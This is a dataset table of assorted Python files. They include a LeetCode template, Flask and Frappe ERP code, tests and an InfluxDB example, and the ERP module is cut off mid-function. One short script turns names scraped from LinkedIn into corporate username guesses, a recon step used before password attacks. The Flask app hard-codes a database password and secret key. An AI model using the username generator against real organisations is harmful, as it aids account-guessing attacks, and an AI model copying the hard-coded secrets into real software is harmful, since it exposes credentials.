text string | size int64 | token_count int64 |
|---|---|---|
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#731. My Calendar II
#Implement a MyCalendarTwo class to store your events. A new event can be added if adding the event will not cause a triple booking.
#Your class will have one method, book(int start, int end). Formally, this represents a booking on the half open interval [start, end), the range of real numbers x such that start <= x < end.
#A triple booking happens when three events have some non-empty intersection (i.e., there is some time that is common to all 3 events.)
#For each call to the method MyCalendar.book, return true if the event can be added to the calendar successfully without causing a triple booking. Otherwise, return false and do not add the event to the calendar.
#Your class will be called like this: MyCalendar cal = new MyCalendar(); MyCalendar.book(start, end)
#Example 1:
#MyCalendar();
#MyCalendar.book(10, 20); // returns true
#MyCalendar.book(50, 60); // returns true
#MyCalendar.book(10, 40); // returns true
#MyCalendar.book(5, 15); // returns false
#MyCalendar.book(5, 10); // returns true
#MyCalendar.book(25, 55); // returns true
#Explanation:
#The first two events can be booked. The third event can be double booked.
#The fourth event (5, 15) can't be booked, because it would result in a triple booking.
#The fifth event (5, 10) can be booked, as it does not use time 10 which is already double booked.
#The sixth event (25, 55) can be booked, as the time in [25, 40) will be double booked with the third event;
#the time [40, 50) will be single booked, and the time [50, 55) will be double booked with the second event.
#Note:
#The number of calls to MyCalendar.book per test case will be at most 1000.
#In calls to MyCalendar.book(start, end), start and end are integers in the range [0, 10^9].
#class MyCalendarTwo(object):
# def __init__(self):
# def book(self, start, end):
# """
# :type start: int
# :type end: int
# :rtype: bool
# """
## Your MyCalendarTwo object will be instantiated and called as such:
## obj = MyCalendarTwo()
## param_1 = obj.book(start,end)
# Time Is Money | 2,243 | 691 |
import myPkgs.Scraper
# Scrape subscription data and persist it (a pickle, per the original note);
# the actual saving is presumably done inside getInfoFromSubScriptions — TODO confirm.
scraper=myPkgs.Scraper.Scraper()
scraper.setSubscriptionsPage()
scraper.getInfoFromSubScriptions()
# create mailHtml | 173 | 70 |
#!/usr/bin/env python
###
# Copyright (c) 2002-2007 Systems in Motion
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
###
# This is an example from the Inventor Mentor,
# chapter 5, example 6.
#
# This example shows the effect of different order of
# operation of transforms. The left object is first
# scaled, then rotated, and finally translated to the left.
# The right object is first rotated, then scaled, and finally
# translated to the right.
#
import sys
from pivy.coin import *
from pivy.sogui import *
def main():
    """Build the Inventor Mentor 5.6 transform-ordering scene and run the GUI loop.

    Left object: scaled, then rotated, then translated left.
    Right object: rotated, then scaled, then translated right.
    Exits the process with status 1 if GUI init or file reading fails.
    """
    # Initialize Inventor and Qt
    myWindow = SoGui.init(sys.argv[0])
    if myWindow is None:  # fixed: identity check instead of `== None`
        sys.exit(1)
    root = SoSeparator()
    # Create two separators, for left and right objects.
    leftSep = SoSeparator()
    rightSep = SoSeparator()
    root.addChild(leftSep)
    root.addChild(rightSep)
    # Create the transformation nodes
    leftTranslation = SoTranslation()
    rightTranslation = SoTranslation()
    myRotation = SoRotationXYZ()
    myScale = SoScale()
    # Fill in the values
    leftTranslation.translation = (-1.0, 0.0, 0.0)
    rightTranslation.translation = (1.0, 0.0, 0.0)
    myRotation.angle = M_PI / 2  # 90 degrees
    myRotation.axis = SoRotationXYZ.X
    myScale.scaleFactor = (2., 1., 3.)
    # Add transforms to the scene.
    leftSep.addChild(leftTranslation)    # left graph
    leftSep.addChild(myRotation)         # then rotated
    leftSep.addChild(myScale)            # first scaled
    rightSep.addChild(rightTranslation)  # right graph
    rightSep.addChild(myScale)           # then scaled
    rightSep.addChild(myRotation)        # first rotated
    # Read an object from file. (as in example 4.2.Lights)
    myInput = SoInput()
    if not myInput.openFile("temple.iv"):
        sys.exit(1)
    fileContents = SoDB.readAll(myInput)
    if fileContents is None:  # fixed: identity check instead of `== None`
        sys.exit(1)
    # Add an instance of the object under each separator.
    leftSep.addChild(fileContents)
    rightSep.addChild(fileContents)
    # Construct a renderArea and display the scene.
    myViewer = SoGuiExaminerViewer(myWindow)
    myViewer.setSceneGraph(root)
    myViewer.setTitle("Transform Ordering")
    myViewer.show()
    myViewer.viewAll()
    SoGui.show(myWindow)
    SoGui.mainLoop()

if __name__ == "__main__":
    main()
| 2,968 | 1,034 |
import os
import json
import pytest
from object_storage import DB
DB_FILE_NAME = "db.json"
def _create_test_db():
    """Return a fresh DB named 'test' backed by the shared test file."""
    return DB("test", file_name=DB_FILE_NAME)
def _create_mock_obj():
return {
"programing_languages_features": {
"python": ["simple", "easy setup"],
"javascript": ["widespread usage", "powerfull"],
}
}
class TestAtributes(object):
    """Behavioral tests for the DB key/value object store."""

    def test_db_have_name(self):
        store = _create_test_db()
        assert store.name == "test"

    def test_insert_retrieve_objects(self):
        store = _create_test_db()
        cases = {
            "topic": "registration",
            "color_list": ["blue", "red", "green"],
            "number": 9,
            "languages": _create_mock_obj(),
        }
        # Insert and read back each value type: str, list, int, nested dict.
        for key, value in cases.items():
            store.insert(key, value)
            assert store.get(key) == value

    def test_db_saves_to_file(self):
        store = _create_test_db()
        store.insert("languages", _create_mock_obj())
        store.save()
        assert os.stat(DB_FILE_NAME) is not None

    def test_db_saves_proper_data_to_file(self):
        store = _create_test_db()
        store.insert("languages", _create_mock_obj())
        store.save()
        with open(DB_FILE_NAME, "r") as f:
            persisted = json.load(f)
        assert persisted == store.objects

    def test_db_loads_from_file(self):
        store = _create_test_db()
        store.insert("number", 1)
        store.save()
        reloaded = DB("test", DB_FILE_NAME, True)
        assert reloaded.objects == {"number": 1}
from flask import Flask, flash, render_template, request, redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
class Config(object):
    """Flask / SQLAlchemy configuration.

    NOTE(review): DB credentials and SECRET_KEY are hard-coded; they should
    come from environment variables in anything beyond a demo.
    """
    SQLALCHEMY_DATABASE_URI = "mysql://root:chuanzhi@127.0.0.1:3306/library"
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    SECRET_KEY = "a13uo1ccl"
class Register(FlaskForm):
    """Form for adding an author/book pair (labels and placeholders in Chinese)."""
    author = StringField("作者", render_kw={"placeholder": "添加作者"})
    book = StringField("书名", render_kw={"placeholder": "添加书名"})
    submit = SubmitField("添加")
# Application and ORM setup.
app = Flask(__name__)
app.config.from_object(Config)
db = SQLAlchemy(app)
class Author(db.Model):
    """An author; one-to-many with Book via the `author` backref."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(15), nullable=False)
    books = db.relation("Book", backref="author")

    def __repr__(self):
        return "Author: {} {}".format(self.name, self.id)
class Book(db.Model):
    """A book belonging to one Author (FK author_id)."""
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(30), nullable=False)
    author_id = db.Column(db.Integer, db.ForeignKey(Author.id))

    def __repr__(self):
        return "Book: {} {}".format(self.name, self.id)
@app.route('/', methods=['GET', 'POST'])
def index():
    """Render the book list; on POST, add a book (creating its author if needed)."""
    form = Register()
    if request.method == "POST":
        if form.validate_on_submit():
            author_name = request.form.get("author")
            book_name = request.form.get("book")
            author = Author.query.filter(Author.name == author_name).first()
            if author:
                # Author exists: only add the book (if not already present).
                book = Book.query.filter(Book.name == book_name).first()
                if book:
                    flash("已经有此书了,请勿重复添加")
                else:
                    new_book = Book(name=book_name, author_id=author.id)
                    db.session.add(new_book)
                    db.session.commit()
            else:
                # No such author: create the author first, then the book.
                new_author = Author(name=author_name)
                db.session.add(new_author)
                db.session.commit()
                new_book = Book(name=book_name, author_id=new_author.id)
                db.session.add(new_book)
                db.session.commit()
        else:
            flash("参数错误")
    authors = Author.query.all()
    return render_template("temp4_72.html", form=form, authors=authors)
@app.route('/del_book/<book_id>')
def del_book(book_id):
    """Delete one book by primary key, then redirect to the index page.

    Flashes an error message when the book does not exist or the delete fails.
    """
    delbook = Book.query.get(book_id)
    if delbook:
        try:
            db.session.delete(delbook)
            # Commit only on success. The original committed in `finally`,
            # which also executed right after a rollback on failure.
            db.session.commit()
        except Exception as e:
            flash(str(e))
            db.session.rollback()
    else:
        flash("书名不存在。。。")
    return redirect(url_for("index"))
@app.route('/del_author/<author_id>')
def del_author(author_id):
    """Delete an author and all of their books, then redirect to the index page."""
    delauthor = Author.query.get(author_id)
    if delauthor:
        # The author's books must be removed before the author row itself.
        books = Book.query.filter(Book.author_id == author_id)
        try:
            for book in books:
                db.session.delete(book)
            db.session.delete(delauthor)
            # Commit only on success. The original committed in `finally`,
            # which also executed right after a rollback on failure.
            db.session.commit()
        except Exception as e:
            flash(str(e))
            db.session.rollback()
    else:
        flash("作者不存在。。。")
    return redirect(url_for("index"))
if __name__ == "__main__":
    # Dev convenience: rebuild the schema from scratch on every run.
    db.drop_all()
    # Create all tables.
    db.create_all()
    # Seed authors.
    au1 = Author(name='老王')
    au2 = Author(name='老尹')
    au3 = Author(name='老刘')
    # Stage the author rows in the session.
    db.session.add_all([au1, au2, au3])
    db.session.commit()
    # Seed books (author ids are available only after the commit above).
    bk1 = Book(name='老王回忆录', author_id=au1.id)
    bk2 = Book(name='我读书少,你别骗我', author_id=au1.id)
    bk3 = Book(name='如何才能让自己更骚', author_id=au2.id)
    bk4 = Book(name='怎样征服美丽少女', author_id=au3.id)
    bk5 = Book(name='如何征服英俊少男', author_id=au3.id)
    # Stage the book rows in the session.
    db.session.add_all([bk1, bk2, bk3, bk4, bk5])
    # Commit the session.
    db.session.commit()
    app.run(debug=True)
| 3,898 | 1,471 |
import pycats.instances # noqa: F401
def test_semigroup():
    """set.combine (added by pycats.instances) behaves as set union."""
    left, right = {1, 2}, {2, 4}
    assert left.combine(right) == {1, 2, 4}
def test_monoid():
    """list.unit (added by pycats.instances) yields the identity: an empty list."""
    assert list.unit() == []
def test_functor():
    """set.map (added by pycats.instances) applies the function to every element."""
    source = {1, 2, 3}
    shifted = source.map(lambda value: value + 2)
    assert shifted == {3, 4, 5}
| 404 | 167 |
# Generate common username permutations from "First Last" lines in linkedin.txt.
# Fixed: Python 2 print statements converted to Python 3 print() calls,
# redundant iter() wrapper removed, and wrong example comments corrected.
with open("linkedin.txt", "r") as fp:
    for name in fp:
        first, last = name.strip().lower().split(" ")
        print(first + "." + last)  # david.lightman
        print(first + last)        # davidlightman
        fl = first[0] + last
        lf = last + first[0]
        print(fl)                  # dlightman
        print(lf)                  # lightmand
        print(fl[:8])              # dlightma
        print(fl[:7] + "2")        # dlightm2
        print(fl[:7] + "3")        # dlightm3
        print(lf[:8])              # lightman
        print(lf[:7] + "2")        # lightma2
        print(lf[:7] + "3")        # lightma3
| 582 | 220 |
from argparse import ArgumentParser
from influxdb import InfluxDBClient
import datetime
import geohash
def main():
    """Write ten example aircraft-location points to InfluxDB and query them back.

    Command-line flags select host/port/credentials/database; the database is
    created if missing. Each point carries a geohash tag so nearby aircraft can
    be looked up by grid cell.
    """
    parser = ArgumentParser(
        description="Writes some example FIXM data to InfluxDB")
    parser.add_argument("--hostname", type=str, default="localhost",
                        help="The hostname of InfluxDB")
    parser.add_argument("--port", type=int, default=8086,
                        help="The port to connect to InfluxDB on")
    parser.add_argument("--username", type=str, default="root",
                        help="The username to authenticate with InfluxDB")
    parser.add_argument("--password", type=str, default="root",
                        help="The password to authenticate with InfluxDB")
    parser.add_argument("--database", type=str, default="fixm",
                        help="The name of the database to write to")
    args = parser.parse_args()
    client = InfluxDBClient(args.hostname, args.port,
                            args.username, args.password,
                            args.database)
    client.create_database(args.database)
    latitude = 33.626675
    longitude = -112.1024746
    current_time = datetime.datetime.now()
    for i in range(10):
        # Generate a Geohash given the coordinates of the aircraft. A geohash
        # allows us to do a "fuzzy search" of all aircraft within the same
        # grid cell. As the geohash precision increases, the size of the grid
        # cells become smaller. I chose 4 here because that allows for a
        # precision of +/- 20 km. That's the closest precision we can get to
        # 9 km, which I think is the closest airplanes are allowed to fly to
        # each other based on a quick search.
        ghash = geohash.encode(latitude, longitude, precision=4)
        # A point is a single row of data in a measurement
        points = [
            {
                # The measurement is analogous to a table in SQL. It's the
                # type of data we're writing.
                "measurement": "location",
                # Tags are fields of the point that are indexed. They're the
                # data we expect to look points up by.
                "tags": {
                    "centre": "ZLA",
                    "flight_number": "N1220W",
                    "geohash": ghash,
                },
                # Time is the time that this point was recorded at
                "time": current_time.isoformat(),
                # Fields are like SQL fields, but unlike tags they are not
                # indexed. This is where the real meat and potatoes of data
                # goes.
                "fields": {
                    "latitude": latitude,
                    "longitude": longitude,
                },
            },
        ]
        client.write_points(points)
        # Simulate movement: nudge latitude and advance the clock one second.
        latitude += 0.01
        current_time += datetime.timedelta(0, 1)
    result = client.query("SELECT * FROM location")
    print(f"Result: {result}")

if __name__ == "__main__":
    main()
| 3,038 | 812 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import frappe
import json
from frappe import _
from frappe.utils import get_fullname, get_link_to_form, get_url_to_form
from datetime import date,datetime,timedelta
import jwt
import time
@frappe.whitelist()
def inventario(item_code):
    """Return per-warehouse actual quantities for *item_code* from Bin."""
    inventario = frappe.get_all('Bin', filters={'item_code': item_code}, fields=['warehouse', 'actual_qty'] )
    frappe.errprint(inventario)
    return(inventario)

@frappe.whitelist()
def pings():
    """Whitelisted connectivity check."""
    return 'pong'
def pingo():
    """Plain (non-whitelisted) connectivity check."""
    response = 'pongo'
    return response
# RG - Update the overdue ("atrasado") and invoice fields on each Customer.
# 1 - After a Payment Entry finalizes, all customers are refreshed; start by computing the overdue date.
# 2 - Freeze (congelado = 1, credit_limit = 1) customers > 40 days overdue; unfreeze (< 40) is currently disabled below.
# 3 - If no Sales Invoice is "Unpaid" or "Overdue", atrasado should be set to 0.
@frappe.whitelist()
def update_atrasado():
    """Refresh overdue-days and freeze flags for every Customer with open 'CC' invoices."""
    clientes = frappe.db.get_list('Customer',fields=['name'])
    for c in clientes:
        # Oldest still-outstanding 'CC' invoice for this customer (ascending date, one row).
        facturas = frappe.db.get_list('Sales Invoice', filters={ 'outstanding_amount': ['>', 1],'customer': c.name,'clave':['like', '%%CC%%'] },
            fields=['name', 'outstanding_amount','posting_date'],
            order_by='posting_date asc',
            page_length=1,
            as_list=True
        )
        if facturas:
            today = date.today()
            someday = facturas[0][2]
            diff = today - someday
            if diff.days > 40:
                # Freeze the customer and propagate overdue info to the invoice join.
                frappe.db.sql("UPDATE tabCustomer set congelado = 1 ,credit_limit = 1 WHERE name = %s", (c.name))
                frappe.errprint(c.name)
                frappe.db.sql("UPDATE `tabSales Invoice` a left join tabCustomer b on a.customer = b.customer_name set congelado = 1, credit_limit = 1, b.atrasado = %s, b.factura = %s WHERE b.name = %s", (diff.days,facturas[0][0],c.name))
                frappe.db.commit()
            # NOTE(review): the unfreeze branch (< 40 days) is commented out in
            # the original, so customers are never unfrozen by this function.
    return
# @ frappe.whitelist ()
# def ubicacion ():
# items = frappe.db.get_list ('Item', fields =['name', 'rack', 'ubicacion'])
# for c in items:
# ajustes = frappe.db.get_list ('Stock Reconciliation Item', fields =['name','item_code', 'anaquel', 'ubicacion'], order_by = 'creation desc')
# for a in ajustes:
# if c.ubicacion != a.rack:
# #frappe.errprint(c.name)
# frappe.errprint(a.anaquel)
# frappe.db.commit()
# #else /* : */
# # frappe.db.sql("UPDATE tabCustomer SET congelado = 0 ,credit_limit = 0 WHERE name = %s", (c.name))
# # frappe.db.commit()
# return
#
# @frappe.whitelist()
# def ruta(login_manager):
# ruta = frappe.db.get_value("User", login_manager.user,"ruta_login")
# frappe.errprint(ruta)
# frappe.local.response["home_page"] = ruta
# {"type":"Feature","properties":{},"geometry":{"type":"LineString","coordinates":[ [-118.383197,32.649782],[-115.382042,32.650772],[-115.380479,32.649689] ] }}]}"
@frappe.whitelist(allow_guest=True)
# Load Ruta records, filter by user and date, and send a FeatureCollection to the front end.
def get_rutas(user,date):
    """Build a GeoJSON LineString FeatureCollection string of a user's route for one day."""
    rutas = frappe.get_all('Ruta', fields=['cliente','nombre_prospecto','lat','lng','creation','comentario'], filters = {'usuario': user, 'date': date } , order_by='creation' )
    frappe.errprint(rutas)
    feature = """ { "type": "FeatureCollection" , "features":[ { "type" : "Feature","properties":{},"geometry":{"type":"LineString","coordinates": [ """
    for i in rutas:
        feature += """ [ """ + str(i.lng) + """,""" + str(i.lat) + """ ] """
        # NOTE(review): last-element detection compares rows by value, so a
        # duplicate row would close the JSON early; an empty result also leaves
        # the string unterminated. Consider index-based joining.
        if i == rutas[-1]:
            feature += """ ]}}]}"""
        else:
            feature += """ , """
    return feature
@frappe.whitelist(allow_guest=True)
# Return the route rows for table display.
def get_tabla(user,date):
    """Return raw Ruta rows for *user* on *date*, ordered by creation."""
    rutas = frappe.get_all('Ruta', fields=['cliente','nombre_prospecto','lat','lng','time','comentario'], filters = {'usuario': user, 'date': date } , order_by='creation' )
    return rutas

@frappe.whitelist(allow_guest=True)
# Return users with the "Vendedor" role profile so the app can start capture.
def get_usuarios():
    """List users whose role_profile_name is 'Vendedor'; a string when none found."""
    usuarios = frappe.get_all('User', fields=['name','full_name'], filters = {'role_profile_name': 'Vendedor'} , order_by='name' )
    if usuarios:
        return usuarios
    else:
        return('No encontrado')
@frappe.whitelist(allow_guest=True)
def generar_lead(owner,lead_name,email_id,numero,lead_owner,source,campaign_name,informacion_adicional,lead_type):
    """Create a Lead from guest-submitted form data and e-mail the lead owner."""
    doc = frappe.get_doc({
        "doctype": "Lead",
        "user": "Administrator",
        "owner": owner,
        "lead_name": lead_name,
        "email_id": email_id,
        "numero": numero,
        "lead_owner": lead_owner,
        "source": source,
        "campaign_name": campaign_name,
        "informacion_adicional": informacion_adicional,
        "lead_type": lead_type
    })
    doc.insert(ignore_permissions=True)
    frappe.db.commit()
    # Notify the lead owner (plus a fixed audit address) with a link to the new Lead.
    frappe.sendmail(['egarcia@totall.mx',"{0}".format(doc.lead_owner)], \
        subject=doc.name , \
        content="Felicidades usted tiene un nuevo prospecto, de click en la liga para darle seguimiento. ¡Exito! "+frappe.utils.get_url_to_form(doc.doctype, doc.name),delayed=False)
@frappe.whitelist(allow_guest=True)
def recorrido(user,lat,lng):
    """Insert a Recorrido (GPS reading) for *user*; guest-accessible."""
    # NOTE(review): logged under an "Error" title even though this is a normal event.
    frappe.log_error(title="Error latitud", message=lat + user)
    doc = frappe.get_doc({
        "doctype": "Recorrido",
        "user": user.strip('"'),
        "lng": lng,
        "lat": lat,
        "phone": user
    })
    doc.insert(ignore_permissions=True)
    frappe.db.commit()
    return('Nueva-Lectura Insertada: ' + str(doc.name))
@frappe.whitelist(allow_guest=True)
# Load the registered stations and build the map file.
def get_estaciones():
    """Return a GeoJSON FeatureCollection string with one Point per Estacion.

    NOTE(review): coordinates are emitted as [lat, lng] to match the original
    output; GeoJSON (RFC 7946) specifies [lng, lat] — confirm what the map
    front end expects before changing the order.
    """
    estaciones = frappe.get_all('Estacion', fields=['nombre','lat','lng'])
    points = []
    for est in estaciones:
        points.append(
            """ { "type" : "Feature","properties":{"name": " """ + est.nombre
            + """ "},"geometry":{"type":"Point","coordinates":[""" + str(est.lat)
            + """,""" + str(est.lng) + """]}}"""
        )
    # Join with commas and always close the collection — the original left the
    # JSON unterminated whenever there were no stations.
    feature = """ { "type": "FeatureCollection" , "features":[ """ + """ , """.join(points) + """ ]} """
    return feature
@frappe.whitelist(allow_guest=True)
def estaciones(estacion,lat,lng):
    """Update the stored coordinates of an Estacion; guest-accessible.

    Returns a Spanish status string either way (updated / not found).
    """
    est = frappe.db.get_value("Estacion", estacion , "name")
    if est:
        frappe.db.sql("UPDATE tabEstacion SET lat=%s , lng= %s WHERE nombre = %s", (lat,lng,estacion))
        frappe.db.commit()
        return ('Estacion Actualizada.')
    else:
        return('no se encontro la estacion')
# RG - Update "actual" quantity on Item.
# TODO: ensure every Item has stock_maximo; get_all stock_maximo < 0 (convert to int).
# Alternative: drive this entirely from Bin and compute reorder there (maybe simpler).
# RG - Wired in hooks -> events as "Bin": "on_update": "totall.api.update_actual".
# RG - Recomputes the reorder point (actual - stock max) shown in the Item "Max" report.
@frappe.whitelist()
def update_actual(self,method):
    """Bin on_update hook: mirror the GENERAL - SAT qty onto the Item and recompute reorder."""
    doc = frappe.get_doc("Item", self.item_code)
    if self.warehouse == 'GENERAL - SAT':
        doc.actual = self.actual_qty
        # NOTE(review): reads stock_maximo from the Bin (self), not the Item — confirm intended.
        doc.reorder = float(self.actual_qty) - float(self.stock_maximo)
        doc.save()
    frappe.errprint('Items actualizado')
# RG - Wired in hooks -> events as "Item": "on_update": "totall.api.update_actual".
# RG - Recomputes the reorder point (actual - stock max) shown in the Item "Max" report.
@frappe.whitelist()
def update_actual_item(self,method):
    """Item on_update hook: recompute the Item's reorder point via raw SQL (avoids re-triggering save)."""
    frappe.errprint('asas')
    reorder = float(self.actual) - float(self.stock_maximo)
    frappe.db.sql("UPDATE tabItem set reorder=%s WHERE name = %s", (str(reorder),self.name) )
# RG - One-off manual backfill of Actual and Reorder on Item (considering stock max).
# RG - TODO: add a similar method to hooks > Events > Item > on_update so it recomputes.
@frappe.whitelist()
def actual():
    """Backfill Item.actual/Item.reorder from GENERAL - SAT bins with 0 < qty < 100."""
    items = frappe.get_all('Bin', filters={'warehouse': 'GENERAL - SAT'}, fields=['name', 'actual_qty','item_code'])
    for i in items:
        if 0 < i.actual_qty < 100:
            doc = frappe.get_doc("Item", i.item_code)
            doc.actual = i.actual_qty
            doc.reorder = float(i.actual_qty) - float(doc.stock_maximo)
            doc.save()
            frappe.errprint(i.item_code + 'actual: ' + str(i.actual_qty) + ' max: ' + str(doc.stock_maximo) )
@frappe.whitelist()
def actualizar():
    """Diagnostic: print Items whose 'actual' is NULL (bulk fixes were run from the console)."""
    items = frappe.db.sql("SELECT name from tabItem WHERE actual IS NULL")
    for i in items:
        item = frappe.db.sql("SELECT actual from tabItem WHERE name = %s",i)
        frappe.errprint(item)
    # TODO: zero out NULL actuals via UPDATE, then recompute reorder
    # (float(actual) - float(stock_maximo)) for all Items with actual == 0.
@frappe.whitelist()
def borrar():
    """Delete empty Bin rows outside the GENERAL - SAT warehouse."""
    return frappe.db.sql("DELETE from `tabBin` where warehouse != 'GENERAL - SAT' and actual_qty = 0")
@frappe.whitelist()
def atrasado():
    """Batch SQL maintenance: settle near-zero invoices, refresh overdue days,
    freeze/unfreeze 'CC' customers at the 40-day mark, and record each party's
    latest non-adjustment Payment Entry."""
    frappe.db.sql("UPDATE `tabSales Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'")
    frappe.db.sql("UPDATE `tabPurchase Invoice` set outstanding_amount = 0, status = 'Paid' where outstanding_amount like '0.%' or outstanding_amount like '-%%'")
    frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = DATEDIFF(CURDATE(), a.posting_date), b.factura = a.name where a.status = 'Overdue' or a.status = 'Unpaid'")
    frappe.db.sql("UPDATE `tabCustomer` set congelado = 1, credit_limit = 1 where atrasado >= 40 and clave like '%%CC%%'")
    frappe.db.sql("UPDATE `tabCustomer` set congelado = 0, credit_limit = 0 where atrasado < 40 and clave like '%%CC%%'")
    frappe.db.sql("UPDATE `tabSales Invoice` a left join `tabCustomer` b on a.customer = b.customer_name set b.atrasado = 0 where a.customer not in (Select customer from `tabSales Invoice` where status = 'Overdue' or status = 'Unpaid')")
    frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'customer' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabCustomer` b on max_creation.party = b.customer_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ")
    frappe.db.sql("update `tabPayment Entry` INNER JOIN (SELECT party, MAX(creation) AS 'tranc_date' FROM `tabPayment Entry` where party_type = 'supplier' AND `tabPayment Entry`.name not like 'AJUSTE%' GROUP BY party) as max_creation ON `tabPayment Entry`.party = max_creation.party AND `tabPayment Entry`.creation = max_creation.tranc_date left JOIN `tabSupplier` b on max_creation.party = b.supplier_name set b.latest_payment = `tabPayment Entry`.name, b.date_latest_payment = `tabPayment Entry`.creation ")
@frappe.whitelist()
def factura_global():
    """Copy `total` into `grand_total` on every CFDI row."""
    frappe.db.sql("UPDATE `tabCFDI` set grand_total = total")

@frappe.whitelist()
def sin_timbrar():
    """Refresh the days-since-creation counter on unstamped Sales Invoices."""
    frappe.db.sql("UPDATE `tabSales Invoice` set sin_timbrar = DATEDIFF(CURDATE(), creation) where cfdi_status='Sin Timbrar'")
@frappe.whitelist()
def nuevas_facturas():
    """Cancel draft Sales Invoices older than 24h (server clock shifted -5h to local time)."""
    anteriores = frappe.db.sql("""SELECT name,creation,date_sub(NOW(),INTERVAL 5 HOUR),TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) FROM `tabSales Invoice` WHERE docstatus = %s AND TIMESTAMPDIFF(HOUR,creation,date_sub(NOW(),INTERVAL 5 HOUR)) > 24""", (0), as_dict=1)
    for a in anteriores:
        # docstatus 2 = cancelled; note the cancellation reason in observaciones.
        frappe.db.sql("""UPDATE `tabSales Invoice` SET docstatus = 2, observaciones ='Factura cancelada por tiempo de espera excedido' WHERE name =%s""",(a.name),as_dict=1)
@frappe.whitelist()
def genera_cotizacion(name='PUR-SQTN-2021-00001'):
    """Create a Quotation from a Supplier Quotation, marking prices up by its margin.

    NOTE(review): the new Quotation starts with no items, so the inner loop over
    its (empty) items never runs — copying items into the Quotation still needs
    to be implemented (see the commented doc.append sketch in the original).
    """
    si = frappe.get_doc('Supplier Quotation', name)
    articulosproveedor = si.items
    margen = si.margen
    frappe.errprint(margen)
    doc = frappe.new_doc('Quotation')
    articulosventa = doc.items
    # Fixed: the original iterated an undefined name `articulos` (NameError);
    # the supplier's line items live in `articulosproveedor`.
    for a in articulosproveedor:
        a.amount = a.amount*margen
        a.valuation_rate = a.rate
        for b in articulosventa:
            b.item_code = a.item_code
            b.amount = a.amount*margen
    doc.save()
    frappe.msgprint('Cotizacion Generada')
# doc.append("items", {
# "item_code": si.items[0].item_code ,
# "qty": 1,
# "precio_de_venta": si.monto / 1.16,
# "monto": si.monto / 1.16,
# "precio_unitario_neto": si.monto / 1.16,
# "precio_neto": si.monto / 1.16,
# "tax": 16,
# "impuestos_totales": (si.monto / 1.16) * 0.16
# })
#
# doc.append("si_sustitucion", {
# "tipo_documento": "Sales Invoice" ,
# "sales_invoice": si.name,
# "uuid": si.uuid,
# "valor": si.monto
# })
#
#
#
@frappe.whitelist()
def boton(name):
    """Convert a POS Invoice into a submitted cash 'TICKET' Sales Invoice."""
    pos = frappe.get_doc('POS Invoice', name)
    doc = frappe.new_doc('Sales Invoice')
    doc.items = pos.items
    doc.customer = pos.customer
    doc.perfil_facturacion = 'TICKET'
    doc.is_pos = 1
    doc.update_stock = 1
    doc.naming_series = 'TICKET'
    # Single cash payment row covering the full POS total.
    doc.append("payments", {
        "mode_of_payment": 'Efectivo',
        "account": '101.01 - Caja y efectivo - SAT',
        "amount": pos.grand_total,
        "type": 'Cash',
        "base_amount": pos.base_grand_total
    })
    doc.save()
    doc.submit()
    frappe.errprint(doc.name)
@frappe.whitelist()
def update_payment_entry(name):
    """Copy each referenced invoice's pending amount onto its Payment Entry Reference row."""
    doc = frappe.get_doc('Payment Entry',name)
    references = doc.references
    gran_total_original = 0
    for r in references:
        si = frappe.get_doc('Sales Invoice', r.reference_name)
        gran_total_original += round(si.monto_pendiente, 2)
        frappe.db.set_value("Payment Entry Reference", r.name, 'monto_pendiente', si.monto_pendiente)
    # The accumulated total is only printed; persisting it is commented out in the original.
    frappe.errprint(gran_total_original)
@frappe.whitelist()
def saldos_cero():
    """Zero out GL credits that exactly match a submitted payment's unallocated
    amount, and clamp negative Sales Invoice balances to zero."""
    frappe.db.sql("""update `tabGL Entry` a LEFT JOIN `tabPayment Entry` b ON a.voucher_no = b.name SET a.credit_in_account_currency = 0 , a.credit = 0 where b.unallocated_amount = a.credit_in_account_currency AND b.unallocated_amount = a.credit AND b.unallocated_amount > 0 AND b.docstatus = 1""")
    frappe.db.sql("""update `tabSales Invoice` SET outstanding_amount = 0 WHERE outstanding_amount < 0""")
@frappe.whitelist()
def crear_pago(name):
    """Create and submit an 'NC-' Payment Entry for a CFDI credit note, link it
    back to the note, and show a confirmation message with a form link."""
    doc = frappe.get_doc('CFDI Nota de Credito',name)
    cliente = frappe.get_doc('Customer',doc.customer)
    today = date.today()
    frappe.errprint(doc.name)
    frappe.errprint(doc.conversion_rate)
    pii = frappe.new_doc("Payment Entry")
    pii.mode_of_payment = 'Transferencia bancaria'
    pii.party_type = 'Customer'
    pii.party = doc.customer
    # Daniel Acosta: an explicit posting date avoids a Fiscal Year error on submit.
    pii.posting_date = today.strftime("%Y-%m-%d")
    pii.reference_no = doc.name
    pii.naming_series = 'NC-'
